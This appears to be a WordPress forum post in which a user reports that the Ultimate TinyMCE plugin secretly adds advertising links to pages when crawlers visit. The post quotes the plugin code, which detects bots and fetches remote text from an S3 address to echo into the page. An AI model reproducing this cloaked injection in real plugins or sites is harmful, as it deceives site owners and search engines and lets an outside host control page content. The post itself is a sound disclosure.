The plugin includes advertising automatically when page is crawled
-
With Google Webmaster Tools I have seen that was including advertising links on the bottom of the page.
I have reviewed the code and I find in the file wp-content\plugins\ ultimate-tinymce\includes\dev_credit.php the following piece of code.
if (jwl_is_bot()) {
//echo “bot”;
$output = @file_get_contents(“https://s3.amazonaws.com/UltimateMCE/ultimatetinymce.txt”);
$str = “”;
if ($output === false ) {
$str= “<!– Awesome Content Generated using the UltimateTinyMCE WP Plugin –>\n”;
} else {
$str = $output;
}
echo jwl_dev_credit_link($str);
}else{
echo “<!– Awesome Content Generated using the UltimateTinyMCE WP Plugin –>\n”;
}I don’t know if it’s legal, but I think it is very dirty.
https://www.ads-software.com/extend/plugins/ultimate-tinymce/
- The topic ‘The plugin includes advertising automatically when page is crawled’ is closed to new replies.